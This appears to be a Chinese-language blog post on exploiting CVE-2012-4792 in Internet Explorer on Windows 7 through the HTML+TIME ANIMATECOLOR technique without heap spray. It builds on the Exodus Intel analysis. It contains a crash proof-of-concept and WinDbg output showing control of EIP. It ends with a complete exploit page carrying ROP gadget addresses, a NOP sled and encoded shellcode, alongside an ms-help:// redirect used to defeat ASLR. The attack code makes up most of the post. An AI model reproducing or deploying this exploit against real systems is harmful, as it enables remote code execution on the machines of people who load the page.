前面的一篇用 Heap Spray 完成了在 Win7 下繞過 DEP 及 ASLR 的利用，這次同樣以 CVE-2012-4792 做爲例子。前面讀了國外的一篇文章：
http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/
文章提到用一種叫「HTML+TIME」的技術，通過該方法可以在不需要 Heap Spray 的情況下完成 exploit，具體說明如下：
<HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> . . . <t:ANIMATECOLOR id="myanim"/>
// Crash trigger for CVE-2012-4792, as given in the Exodus Intel analysis linked above.
// animvalues, i and a are implicit globals (no var), so this snippet is meant to run
// as top-level script in the page rather than inside a function.
animvalues = "\u4141\u4141"
// Double the string until it holds at least 0xDC UTF-16 code units of 0x4141, then
// append 21 ";cyan" entries (presumably so the string still parses as a colour list — confirm).
while(animvalues.length < 0xDC) { animvalues += animvalues }
for(i = 0; i < 21; i++) { animvalues += ";cyan"; }
try {
// Hand the crafted string to the t:ANIMATECOLOR element's values attribute; the debugger
// output further down (eip=41414141) shows the filler pattern being used as a code address.
a = document.getElementById('myanim');
a.values = animvalues;
}
// Any script error is deliberately discarded, so a failed trigger is silent.
catch(e) {}
<!doctype html>
<!-- Crash proof-of-concept for CVE-2012-4792 (from the Exodus Intel analysis linked above).
     It depends on the IE-only HTML+TIME behaviour: the #default#time2 namespace import and the
     t:ANIMATECOLOR element below. That import is a convenient indicator for content inspection. -->
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
// Entered from body onload. animvalues, i and a are implicit globals (no var).
function helloWorld() {
  var e0 = null;
  var e1 = null;
  var e2 = null;
  // Same filler as the snippet above: 0x4141 doubled to >= 0xDC UTF-16 units, then 21 ";cyan" entries.
  animvalues = "\u4141\u4141"
  while(animvalues.length < 0xDC) { animvalues += animvalues }
  for(i = 0; i < 21; i++) { animvalues += ";cyan"; }
  try {
    // Re-parents the form (#a), dfn (#b) and a freshly created q element.
    // NOTE(review): presumably order-sensitive — keep the call sequence as is.
    e0 = document.getElementById("a");
    e1 = document.getElementById("b");
    e2 = document.createElement("q");
    e1.applyElement(e2);
    e1.appendChild(document.createElement('button'));
    e1.applyElement(e0);
    e2.outerText = "";
    e2.appendChild(document.createElement('body'));
  }
  // Errors are swallowed on purpose so the page shows no script error.
  catch(e) { }
  // IE JScript-specific: runs a garbage-collection pass before the values assignment.
  CollectGarbage();
  try {
    a = document.getElementById('myanim');
    a.values = animvalues;
  }
  catch(e) {}
}
</script>
</head>
<!-- eval() is redundant here: helloWorld() returns nothing, so eval(undefined) is a no-op. -->
<body onload="eval(helloWorld())">
<t:ANIMATECOLOR id="myanim"/>
<form id="a"> </form>
<dfn id="b"> </dfn>
</body>
</html>
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
eip=41414141 esp=020df830 ebp=020df8a4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
0:008> dd edi
00216468 00199c60 02e1ebc0 0023f5c0 0023f5d8
00216478 0023f578 0016bda0 0016bbd8 00187da0
00216488 0333bce0 0333bcf8 0333bd10 0333bd28
00216498 0333bd40 0333bd58 0333bd70 0333bd88
002164a8 0333bda0 0333bdb8 0333bdd0 0333bde8
002164b8 0333be00 0333be18 eaa84100 ff080000
002164c8 000000fe 00000000 00000000 00000000
002164d8 00000000 00000000 00000000 00000000
0:008> dc poi(edi)
00199c60 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c70 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c80 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c90 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199ca0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cb0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cc0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cd0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0:008> dc poi(edi+4)
02e1ebc0 00790063 006e0061 02e80000 00000000 c.y.a.n.........
02e1ebd0 eaf06f92 ff080167 02e235dc 001f9038 .o..g....5..8...
02e1ebe0 02e8e12c 00000000 eaf06f95 ff0c0100 ,........o......
02e1ebf0 6359d910 00000001 001f9028 00000000 ..Yc....(.......
02e1ec00 eaf06f68 ff0c010a 00000000 00000000 ho..............
02e1ec10 00000001 00000000 eaf06f6b ff080100 ........ko......
02e1ec20 0021cfd0 001f9038 02e1eb78 00000000 ..!.8...x.......
02e1ec30 00000000 00000000 00000000 00000000 ................
0:008> dc poi(edi+8)
0023f5c0 00790063 006e0061 00200000 00000000 c.y.a.n... .....
0023f5d0 eaabd9a2 ff0e0100 00790063 006e0061 ........c.y.a.n.
0023f5e0 00200000 00000000 eaabd9a5 ff080100 .. .............
0023f5f0 00148098 00000001 1690030b 01700d8c ..............p.
0023f600 eaabd9d8 ff080100 0063006e 006c0061 ........n.c.a.l.
0023f610 00700072 00000063 eaabd9db ff0c0100 r.p.c...........
0023f620 00000002 50000001 50000007 02db1318 .......P...P....
0023f630 eaabd9de ff0a0100 0074006e 00760073 ........n.t.s.v.
<!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> location.href = 'ms-help://' function helloWorld() { var e0 = null; var e1 = null; var e2 = null; animvalues = "\u34b4\u51bf\u10b8\u51bd\u2d97\u51bd\ucba0\u51bd"+ "\u79e2\u51c3\u9683\u51c5\u6fbd\u51c5\ufffe\ua17f"+ "\u1e01\u51c1\u92d8\u51c3\ue67d\u51bf\u6fbd\u51c5"+ "\ufc3d\ua17f\u1e01\u51c1\u592b\u51bf\ucf3e\u51be"+ "\ud150\u51c5\uf563\u51be\u7402\u51c0\u6fbd\u51c5"+ "\u9090\u9090\ua8dc\u51bd"+ //ROP End "\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u4a41\u51be"+ "\u9090\u9090"+ "\uc481\uf254\uffff\u2ebf\ue4ed\udbc0\ud9c8\u2474" + "\u58f4\uc933\u33b1\u7831\u0312\u1278\uee83\u06e9" + "\u1235\u4f19\ueab6\u30da\u0f3e\u62eb\u4424\ub35e" + "\u082e\u3853\ub862\u4ce0\ucfab\ufa41\ufe8d\uca52" + "\uac11\u4c91\uaeee\uaec5\u61cf\uae18\u9f08\ue2d3" + "\ud4c1\u1346\ua865\u125a\ua7a9\u6ce3\u77cc\uc697" + "\ua7cf\u5c08\u5f87\u3a22\u5e38\u58e7\u2904\uab8c" + "\ua8fe\ue244\u9bff\ua9a8\u14c1\ub325\u9206\uc6d6" + "\ue17c\ud16b\u9846\u54b7\u3a5b\uce33\ubbbf\u8990" + "\ub734\udd5d\udb13\u3260\ue728\ub5e9\u6eff\u91a9" + "\u2bdb\ubb69\u917a\uc4dc\u7d9d\u6080\u6fd5\u13d5" + "\ue5b4\u9128\u40c2\ua92a\ue2cc\u9843\u6d47\u2513" + "\uca82\u6feb\u7a8f\u3664\u3f45\uc9e9\u03b3\u4a14" + "\ufb36\u52e3\ufe33\ud4a8\u72af\ub0a0\u21cf\u90c1" + "\ua4b3\u7851\u431a\u1bd2\u4162"; for(i = 0; i < 21; i++) { animvalues += ";cyan"; } try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); 
e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld())"> <t:ANIMATECOLOR id="myanim"/> <form id="a"> </form> <dfn id="b"> </dfn> </body> </html>
這樣就可以在不使用 Heap Spray 的情況下完成漏洞的利用。